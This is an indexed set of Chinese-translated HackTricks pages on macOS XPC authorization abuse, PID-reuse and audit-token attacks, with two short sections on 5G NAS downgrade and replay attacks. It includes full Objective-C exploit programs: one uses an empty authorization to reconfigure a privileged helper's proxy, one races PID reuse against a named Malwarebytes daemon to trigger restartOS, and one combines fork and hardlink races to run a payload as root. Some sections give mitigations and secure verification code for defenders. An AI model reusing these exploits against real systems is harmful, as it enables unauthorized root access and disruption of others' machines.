此键不在没有身份验证的情况下授予权限。相反,如果设置为true,则意味着一旦权限经过身份验证,它可以在多个进程之间共享,而无需每个进程重新进行身份验证。但初始授予权限仍然需要身份验证,除非与其他键结合使用,如\'authenticate-user\': \'false\'。 您可以 使用此脚本 来获取有趣的权限: bash Rights with \'authenticate-user\': \'false\':\\nis-admin (admin), is-admin-nonshared (admin), is-appstore (_appstore), is-developer (_developer), is-lpadmin (_lpadmin), is-root (run as root), is-session-owner (session owner), is-webdeveloper (_webdeveloper), system-identity-write-self (session owner), system-install-iap-software (run as root), system-install-software-iap (run as root) Rights with \'allow-root\': \'true\':\\ncom-apple-aosnotification-findmymac-remove, com-apple-diskmanagement-reservekek, com-apple-openscripting-additions-send, com-apple-reportpanic-fixright, com-apple-servicemanagement-blesshelper, com-apple-xtype-fontmover-install, com-apple-xtype-fontmover-remove, com-apple-dt-instruments-process-analysis, com-apple-dt-instruments-process-kill, com-apple-pcastagentconfigd-wildcard, com-apple-trust-settings-admin, com-apple-wifivelocity, com-apple-wireless-diagnostics, is-root, system-install-iap-software, system-install-software, system-install-software-iap, system-preferences, system-preferences-accounts, system-preferences-datetime, system-preferences-energysaver, system-preferences-network, system-preferences-printing, system-preferences-security, system-preferences-sharing, system-preferences-softwareupdate, system-preferences-startupdisk, system-preferences-timemachine, system-print-operator, system-privilege-admin, system-services-networkextension-filtering, system-services-networkextension-vpn, system-services-systemconfiguration-network, system-sharepoints-wildcard Rights with \'session-owner\': \'true\':\\nauthenticate-session-owner, authenticate-session-owner-or-admin, authenticate-session-user, com-apple-safari-allow-apple-events-to-run-javascript, com-apple-safari-allow-javascript-in-smart-search-field, com-apple-safari-allow-unsigned-app-extensions, com-apple-safari-install-ephemeral-extensions, com-apple-safari-show-credit-card-numbers, com-apple-safari-show-passwords, com-apple-icloud-passwordreset, com-apple-icloud-passwordreset, is-session-owner, system-identity-write-self, use-login-window-ui","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 宽松权限","id":"2449","title":"宽松权限"},"245":{"body":"背景: UE 在 Registration Request 的 UE Security Capability IE 中通告支持的 EEA(加密)和 EIA(完整性)。 常见映射:EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC;EEA0/EIA0 为 null 算法。 问题: 由于 Registration Request 未受完整性保护,on-path 攻击者可以清除能力位以在后续的 Security Mode Command 中强制选择 EEA0/EIA0。部分实现错误地在紧急服务之外允许 null 算法。 攻击步骤(进攻方): 截获 InitialUEMessage 并修改 NAS UE Security Capability,使其只通告 EEA0/EIA0。 使用 Sni5Gect,hook NAS 消息并在转发前补丁能力位。 观察 AMF 是否接受 null 加密/完整性并以 EEA0/EIA0 完成 Security Mode。 验证/可见性: 在 Wireshark 中,确认 Security Mode Command/Complete 之后选定的算法。 示例被动嗅探输出: Encyrption in use [EEA0]\\nIntegrity in use [EIA0, EIA1, EIA2]\\nSUPI (MCC+MNC+MSIN) 9997000000001 Mitigations (must): 配置 AMF/policy 拒绝 EEA0/EIA0,除非严格要求(例如 emergency calls)。 优先至少强制执行 EEA2/EIA2;对任何协商 null algorithms 的 NAS 安全上下文进行记录并触发告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.2 能力降级到 null 算法(EEA0/EIA0)","id":"245","title":"9.2 能力降级到 null 算法(EEA0/EIA0)"},"2450":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 反向授权","id":"2450","title":"反向授权"},"2451":{"body":"如果你发现函数: [HelperTool checkAuthorization:command:] ,那么这个进程可能正在使用前面提到的授权模式: 如果这个函数调用了诸如 AuthorizationCreateFromExternalForm、authorizationRightForCommand、AuthorizationCopyRights、AuhtorizationFree 的函数,那么它正在使用 EvenBetterAuthorizationSample 。 检查 /var/db/auth.db 以查看是否可以在没有用户交互的情况下获取调用某些特权操作的权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 检查是否使用了 EvenBetterAuthorization","id":"2451","title":"检查是否使用了 EvenBetterAuthorization"},"2452":{"body":"然后,你需要找到协议模式,以便能够与 XPC 服务建立通信。 函数 shouldAcceptNewConnection 表示正在导出的协议: 在这种情况下,我们与 EvenBetterAuthorizationSample 中的相同, 查看这一行 。 知道所使用的协议名称后,可以使用以下命令 转储其头部定义 : bash class-dump /Library/PrivilegedHelperTools/com.example.HelperTool [...]\\n@protocol HelperToolProtocol\\n- (void)overrideProxySystemWithAuthorization:(NSData *)arg1 setting:(NSDictionary *)arg2 reply:(void (^)(NSError *))arg3;\\n- (void)revertProxySystemWithAuthorization:(NSData *)arg1 restore:(BOOL)arg2 reply:(void (^)(NSError *))arg3;\\n- (void)legacySetProxySystemPreferencesWithAuthorization:(NSData *)arg1 enabled:(BOOL)arg2 host:(NSString *)arg3 port:(NSString *)arg4 reply:(void (^)(NSError *, BOOL))arg5;\\n- (void)getVersionWithReply:(void (^)(NSString *))arg1;\\n- (void)connectWithEndpointReply:(void (^)(NSXPCListenerEndpoint *))arg1;\\n@end\\n[...] 最后,我们只需要知道 暴露的 Mach 服务的名称 以便与之建立通信。有几种方法可以找到它: 在 [HelperTool init] 中,您可以看到正在使用的 Mach 服务: 在 launchd plist: xml cat /Library/LaunchDaemons/com.example.HelperTool.plist [...] MachServices\\n\\ncom.example.HelperTool\\n\\n\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 协议通信","id":"2452","title":"协议通信"},"2453":{"body":"在此示例中创建了: 协议的定义及其函数 一个空的授权,用于请求访问 与 XPC 服务的连接 如果连接成功,则调用该函数 objectivec // gcc -framework Foundation -framework Security expl.m -o expl #import \\n#import // Define a unique service name for the XPC helper\\nstatic NSString* XPCServiceName = @\\"com.example.XPCHelper\\"; // Define the protocol for the helper tool\\n@protocol XPCHelperProtocol\\n- (void)applyProxyConfigWithAuthorization:(NSData *)authData settings:(NSDictionary *)settings reply:(void (^)(NSError *))callback;\\n- (void)resetProxyConfigWithAuthorization:(NSData *)authData restoreDefault:(BOOL)shouldRestore reply:(void (^)(NSError *))callback;\\n- (void)legacyConfigureProxyWithAuthorization:(NSData *)authData enabled:(BOOL)isEnabled host:(NSString *)hostAddress port:(NSString *)portNumber reply:(void (^)(NSError *, BOOL))callback;\\n- (void)fetchVersionWithReply:(void (^)(NSString *))callback;\\n- (void)establishConnectionWithReply:(void (^)(NSXPCListenerEndpoint *))callback;\\n@end int main(void) {\\nNSData *authData;\\nOSStatus status;\\nAuthorizationExternalForm authForm;\\nAuthorizationRef authReference = {0};\\nNSString *proxyAddress = @\\"127.0.0.1\\";\\nNSString *proxyPort = @\\"4444\\";\\nBoolean isProxyEnabled = true; // Create an empty authorization reference\\nstatus = AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authReference);\\nconst char* errorMsg = CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg); // Convert the authorization reference to an external form\\nif (status == errAuthorizationSuccess) {\\nstatus = AuthorizationMakeExternalForm(authReference, &authForm);\\nerrorMsg = CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg);\\n} // Convert the external form to NSData for transmission\\nif (status == errAuthorizationSuccess) {\\nauthData = [[NSData alloc] initWithBytes:&authForm length:sizeof(authForm)];\\nerrorMsg = CFStringGetCStringPtr(SecCopyErrorMessageString(status, nil), kCFStringEncodingMacRoman);\\nNSLog(@\\"OSStatus: %s\\", errorMsg);\\n} // Ensure the authorization was successful\\nassert(status == errAuthorizationSuccess); // Establish an XPC connection\\nNSString *serviceName = XPCServiceName;\\nNSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:serviceName options:0x1000];\\nNSXPCInterface *xpcInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCHelperProtocol)];\\n[xpcConnection setRemoteObjectInterface:xpcInterface];\\n[xpcConnection resume]; // Handle errors for the XPC connection\\nid remoteProxy = [xpcConnection remoteObjectProxyWithErrorHandler:^(NSError *error) {\\nNSLog(@\\"[-] Connection error\\");\\nNSLog(@\\"[-] Error: %@\\", error);\\n}]; // Log the remote proxy and connection objects\\nNSLog(@\\"Remote Proxy: %@\\", remoteProxy);\\nNSLog(@\\"XPC Connection: %@\\", xpcConnection); // Use the legacy method to configure the proxy\\n[remoteProxy legacyConfigureProxyWithAuthorization:authData enabled:isProxyEnabled host:proxyAddress port:proxyPort reply:^(NSError *error, BOOL success) {\\nNSLog(@\\"Response: %@\\", error);\\n}]; // Allow some time for the operation to complete\\n[NSThread sleepForTimeInterval:10.0f]; NSLog(@\\"Finished!\\");\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 利用示例","id":"2453","title":"利用示例"},"2454":{"body":"https://blog.securelayer7.net/applied-endpointsecurity-framework-previlege-escalation/?utm_source=pocket_shared","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 其他被滥用的 XPC 权限助手","id":"2454","title":"其他被滥用的 XPC 权限助手"},"2455":{"body":"https://theevilbit.github.io/posts/secure_coding_xpc_part1/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 参考文献","id":"2455","title":"参考文献"},"2456":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS XPC 连接进程检查","id":"2456","title":"macOS XPC 连接进程检查"},"2457":{"body":"当与 XPC 服务建立连接时,服务器将检查该连接是否被允许。通常会执行以下检查: 检查连接的 进程是否使用 Apple 签名 的证书(仅由 Apple 发放)。 如果 未验证 ,攻击者可以创建一个 伪造证书 来匹配其他检查。 检查连接进程是否使用 组织的证书 (团队 ID 验证)。 如果 未验证 ,可以使用 任何开发者证书 从 Apple 进行签名,并连接到服务。 检查连接进程 是否包含正确的包 ID 。 如果 未验证 ,任何 由同一组织签名的工具 都可以用来与 XPC 服务交互。 (4 或 5) 检查连接进程是否具有 正确的软件版本号 。 如果 未验证 ,旧的、不安全的客户端,易受进程注入攻击,可以在其他检查到位的情况下连接到 XPC 服务。 (4 或 5) 检查连接进程是否具有没有危险权限的 强化运行时 (如允许加载任意库或使用 DYLD 环境变量的权限)。 如果 未验证 ,客户端可能 易受代码注入 攻击。 检查连接进程是否具有允许其连接到服务的 权限 。这适用于 Apple 二进制文件。 验证 必须 基于 连接 客户端的审计令牌 而不是 其进程 ID ( PID ),因为前者可以防止 PID 重用攻击 。 开发者 很少使用审计令牌 API 调用,因为它是 私有的 ,所以 Apple 可能会 随时更改 。此外,私有 API 的使用在 Mac App Store 应用中是不允许的。 如果使用 processIdentifier 方法,可能会存在漏洞。 应使用 xpc_dictionary_get_audit_token 而不是 xpc_connection_get_audit_token ,因为后者在某些情况下也可能 存在漏洞 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » XPC 连接进程检查","id":"2457","title":"XPC 连接进程检查"},"2458":{"body":"有关 PID 重用攻击的更多信息,请查看: macOS PID Reuse 有关 xpc_connection_get_audit_token 攻击的更多信息,请查看: macOS xpc_connection_get_audit_token Attack","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » 通信攻击","id":"2458","title":"通信攻击"},"2459":{"body":"Trustcache 是一种防御方法,在 Apple Silicon 机器中引入,存储 Apple 二进制文件的 CDHSAH 数据库,以便仅允许未修改的二进制文件执行。这可以防止降级版本的执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » Trustcache - 降级攻击防范","id":"2459","title":"Trustcache - 降级攻击防范"},"246":{"body":"由于 initial NAS 缺乏完整性和新鲜度,捕获到的 InitialUEMessage+Registration Request 可以被重放到 AMF。 PoC rule for 5GReplay to forward matching replays: xml \\n \\n \\n \\n What to observe: AMF 是否接受重放并继续 Authentication;缺乏新鲜性/上下文验证表明存在暴露。 Mitigations: 在 AMF 强制实施重放保护/上下文绑定;对每个 GNB/UE 进行速率限制和关联检测。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.3 重放 initial Registration Request (pre-security NAS)","id":"246","title":"9.3 重放 initial Registration Request (pre-security NAS)"},"2460":{"body":"服务器将在名为 shouldAcceptNewConnection 的函数中实现此 验证 。 objectivec - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {\\n//Check connection\\nreturn YES;\\n} 对象 NSXPCConnection 有一个 private 属性 auditToken (应该使用但可能会更改)和一个 public 属性 processIdentifier (不应该使用)。 连接进程可以通过以下方式进行验证: objectivec [...]\\nSecRequirementRef requirementRef = NULL;\\nNSString requirementString = @\\"anchor apple generic and identifier \\\\\\"xyz.hacktricks.service\\\\\\" and certificate leaf [subject.CN] = \\\\\\"TEAMID\\\\\\" and info [CFBundleShortVersionString] >= \\\\\\"1.0\\\\\\"\\";\\n/* Check:\\n- Signed by a cert signed by Apple\\n- Check the bundle ID\\n- Check the TEAMID of the signing cert\\n- Check the version used\\n*/ // Check the requirements with the PID (vulnerable)\\nSecRequirementCreateWithString(requirementString, kSecCSDefaultFlags, &requirementRef);\\nSecCodeCheckValidity(code, kSecCSDefaultFlags, requirementRef); // Check the requirements wuing the auditToken (secure)\\nSecTaskRef taskRef = SecTaskCreateWithAuditToken(NULL, ((ExtendedNSXPCConnection*)newConnection).auditToken);\\nSecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString)) 如果开发者不想检查客户端的版本,他至少可以检查客户端是否不易受到进程注入的攻击: objectivec [...]\\nCFDictionaryRef csInfo = NULL;\\nSecCodeCopySigningInformation(code, kSecCSDynamicInformation, &csInfo);\\nuint32_t csFlags = [((__bridge NSDictionary *)csInfo)[(__bridge NSString *)kSecCodeInfoStatus] intValue];\\nconst uint32_t cs_hard = 0x100; // don\'t load invalid page.\\nconst uint32_t cs_kill = 0x200; // Kill process if page is invalid\\nconst uint32_t cs_restrict = 0x800; // Prevent debugging\\nconst uint32_t cs_require_lv = 0x2000; // Library Validation\\nconst uint32_t cs_runtime = 0x10000; // hardened runtime\\nif ((csFlags & (cs_hard | cs_require_lv)) {\\nreturn Yes; // Accept connection\\n} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » 代码示例","id":"2460","title":"代码示例"},"2461":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » macOS PID 重用","id":"2461","title":"macOS PID 重用"},"2462":{"body":"当 macOS XPC 服务 基于 PID 而不是 审计令牌 检查被调用的进程时,它容易受到 PID 重用攻击。此攻击基于 竞争条件 ,其中 利用 将 消息发送到 XPC 服务 滥用 功能,随后执行 posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ) 以使用 允许的 二进制文件。 此函数将使 允许的二进制文件拥有 PID ,但 恶意的 XPC 消息会在此之前发送 。因此,如果 XPC 服务 使用 PID 来 验证 发送者,并在执行 posix_spawn 之后检查它,它将认为消息来自 授权 进程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » PID 重用","id":"2462","title":"PID 重用"},"2463":{"body":"如果你找到函数 shouldAcceptNewConnection 或其调用的函数 调用 processIdentifier 而不调用 auditToken ,这很可能意味着它在 验证进程 PID 而不是审计令牌。 例如在这张图片中(取自参考): 查看这个示例利用(同样取自参考)以查看利用的两个部分: 一个 生成多个分叉 每个分叉 将 发送 有效载荷 到 XPC 服务,同时在发送消息后立即执行 posix_spawn 。 caution 为了使利用有效,重要的是 export`` `` OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES 或在利用中放入: asm(\\".section __DATA,__objc_fork_ok\\\\n\\"\\n\\"empty:\\\\n\\"\\n\\".no_dead_strip empty\\\\n\\"); NSTasks\\nfork 第一种选项使用 NSTasks 和参数来启动子进程以利用 RC objectivec // Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/\\n// gcc -framework Foundation expl.m -o expl #import \\n#include \\n#include #define RACE_COUNT 32\\n#define MACH_SERVICE @\\"com.malwarebytes.mbam.rtprotection.daemon\\"\\n#define BINARY \\"/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon\\" // allow fork() between exec()\\nasm(\\".section __DATA,__objc_fork_ok\\\\n\\"\\n\\"empty:\\\\n\\"\\n\\".no_dead_strip empty\\\\n\\"); extern char **environ; // defining necessary protocols\\n@protocol ProtectionService\\n- (void)startDatabaseUpdate;\\n- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;\\n- (void)uninstallProduct;\\n- (void)installProductUpdate;\\n- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;\\n- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;\\n- (void)triggerLicenseRelatedChecks;\\n- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;\\n- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;\\n- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;\\n- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;\\n- (void)restartOS;\\n- (void)resumeScanJob;\\n- (void)pauseScanJob;\\n- (void)stopScanJob;\\n- (void)startScanJob;\\n- (void)disposeOperationBy:(NSUUID *)arg1;\\n- (void)subscribeTo:(long long)arg1;\\n- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;\\n@end void child() { // send the XPC messages\\nNSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];\\nNSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];\\nxpcConnection.remoteObjectInterface = remoteInterface; [xpcConnection resume];\\n[xpcConnection.remoteObjectProxy restartOS]; char target_binary[] = BINARY;\\nchar *target_argv[] = {target_binary, NULL};\\nposix_spawnattr_t attr;\\nposix_spawnattr_init(&attr);\\nshort flags;\\nposix_spawnattr_getflags(&attr, &flags);\\nflags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);\\nposix_spawnattr_setflags(&attr, flags);\\nposix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);\\n} bool create_nstasks() { NSString *exec = [[NSBundle mainBundle] executablePath];\\nNSTask *processes[RACE_COUNT]; for (int i = 0; i < RACE_COUNT; i++) {\\nprocesses[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @\\"imanstask\\" ]];\\n} int i = 0;\\nstruct timespec ts = {\\n.tv_sec = 0,\\n.tv_nsec = 500 * 1000000,\\n}; nanosleep(&ts, NULL);\\nif (++i > 4) {\\nfor (int i = 0; i < RACE_COUNT; i++) {\\n[processes[i] terminate];\\n}\\nreturn false;\\n} return true;\\n} int main(int argc, const char * argv[]) { if(argc > 1) {\\n// called from the NSTasks\\nchild(); } else {\\nNSLog(@\\"Starting the race\\");\\ncreate_nstasks();\\n} return 0;\\n} 这个例子使用原始 fork 来启动 将利用 PID 竞争条件的子进程 ,然后通过硬链接利用 另一个竞争条件: objectivec // export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES\\n// gcc -framework Foundation expl.m -o expl #include \\n#include \\n#include // TODO: CHANGE PROTOCOL AND FUNCTIONS\\n@protocol HelperProtocol\\n- (void)DoSomething:(void (^)(_Bool))arg1;\\n@end // Global flag to track exploitation status\\nbool pwned = false; /**\\n* Continuously overwrite the contents of the \'hard_link\' file in a race condition to make the\\n* XPC service verify the legit binary and then execute as root out payload.\\n*/\\nvoid *check_race(void *arg) {\\nwhile(!pwned) {\\n// Overwrite with contents of the legit binary\\nsystem(\\"cat ./legit_bin > hard_link\\");\\nusleep(50000); // Overwrite with contents of the payload to execute\\n// TODO: COMPILE YOUR OWN PAYLOAD BIN\\nsystem(\\"cat ./payload > hard_link\\");\\nusleep(50000);\\n}\\nreturn NULL;\\n} void child_xpc_pid_rc_abuse(){\\n// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION\\n#define kValid \\"./Legit Updater.app/Contents/MacOS/Legit\\"\\nextern char **environ; // Connect with XPC service\\n// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT\\nNSString* service_name = @\\"com.example.Helper\\";\\nNSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];\\n// TODO: CNAGE THE PROTOCOL NAME\\nNSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];\\n[connection setRemoteObjectInterface:interface];\\n[connection resume]; id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {\\nNSLog(@\\"[-] Something went wrong\\");\\nNSLog(@\\"[-] Error: %@\\", error);\\n}]; NSLog(@\\"obj: %@\\", obj);\\nNSLog(@\\"conn: %@\\", connection); // Call vulenrable XPC function\\n// TODO: CHANEG NAME OF FUNCTION TO CALL\\n[obj DoSomething:^(_Bool b){\\nNSLog(@\\"Response, %hdd\\", b);\\n}]; // Change current process to the legit binary suspended\\nchar target_binary[] = kValid;\\nchar *target_argv[] = {target_binary, NULL};\\nposix_spawnattr_t attr;\\nposix_spawnattr_init(&attr);\\nshort flags;\\nposix_spawnattr_getflags(&attr, &flags);\\nflags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);\\nposix_spawnattr_setflags(&attr, flags);\\nposix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);\\n} /**\\n* Function to perform the PID race condition using children calling the XPC exploit.\\n*/\\nvoid xpc_pid_rc_abuse() {\\n#define RACE_COUNT 1\\nextern char **environ;\\nint pids[RACE_COUNT]; // Fork child processes to exploit\\nfor (int i = 0; i < RACE_COUNT; i++) {\\nint pid = fork();\\nif (pid == 0) { // If a child process\\nchild_xpc_pid_rc_abuse();\\n}\\nprintf(\\"forked %d\\\\n\\", pid);\\npids[i] = pid;\\n} // Wait for children to finish their tasks\\nsleep(3); // Terminate child processes\\nfor (int i = 0; i < RACE_COUNT; i++) {\\nif (pids[i]) {\\nkill(pids[i], 9);\\n}\\n}\\n} int main(int argc, const char * argv[]) {\\n// Create and set execution rights to \'hard_link\' file\\nsystem(\\"touch hard_link\\");\\nsystem(\\"chmod +x hard_link\\"); // Create thread to exploit sign verification RC\\npthread_t thread;\\npthread_create(&thread, NULL, check_race, NULL); while(!pwned) {\\n// Try creating \'download\' directory, ignore errors\\nsystem(\\"mkdir download 2>/dev/null\\"); // Create a hardlink\\n// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC\\nsystem(\\"ln hard_link download/legit_bin\\"); xpc_pid_rc_abuse();\\nusleep(10000); // The payload will generate this file if exploitation is successfull\\nif (access(\\"/tmp/pwned\\", F_OK ) == 0) {\\npwned = true;\\n}\\n} return 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 利用示例","id":"2463","title":"利用示例"},"2464":{"body":"https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 其他示例","id":"2464","title":"其他示例"},"2465":{"body":"https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/ https://saelo.github.io/presentations/warcon18_dont_trust_the_pid.pdf tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS PID Reuse » 参考文献","id":"2465","title":"参考文献"},"2466":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多信息,请查看原始帖子: https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/ 。这是一个总结:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » macOS xpc_connection_get_audit_token 攻击","id":"2466","title":"macOS xpc_connection_get_audit_token 攻击"},"2467":{"body":"如果你不知道 Mach 消息是什么,请开始查看这个页面: macOS IPC - Inter Process Communication 目前请记住( 此处定义 ): Mach 消息通过 mach 端口 发送,这是一个内置于 mach 内核的 单接收者,多发送者通信 通道。 多个进程可以向 mach 端口发送消息 ,但在任何时候 只有一个进程可以从中读取 。就像文件描述符和套接字一样,mach 端口由内核分配和管理,进程只看到一个整数,可以用来指示内核它们想使用哪个 mach 端口。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » Mach 消息基本信息","id":"2467","title":"Mach 消息基本信息"},"2468":{"body":"如果你不知道如何建立 XPC 连接,请查看: macOS XPC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Connecting Process Check » macOS xpc_connection_get_audit_token Attack » XPC 连接","id":"2468","title":"XPC 连接"},"2469":{"body":"你需要知道的是 XPC 的抽象是一个一对一的连接 ,但它基于一种 可以有多个发送者的技术,因此: Mach 端口是单接收者, 多个发送者 。 XPC 连接的审计令牌是 从最近接收到的消息中复制的审计令牌 。 获取 XPC 连接的 审计令牌 对许多 安全检查 至关重要。 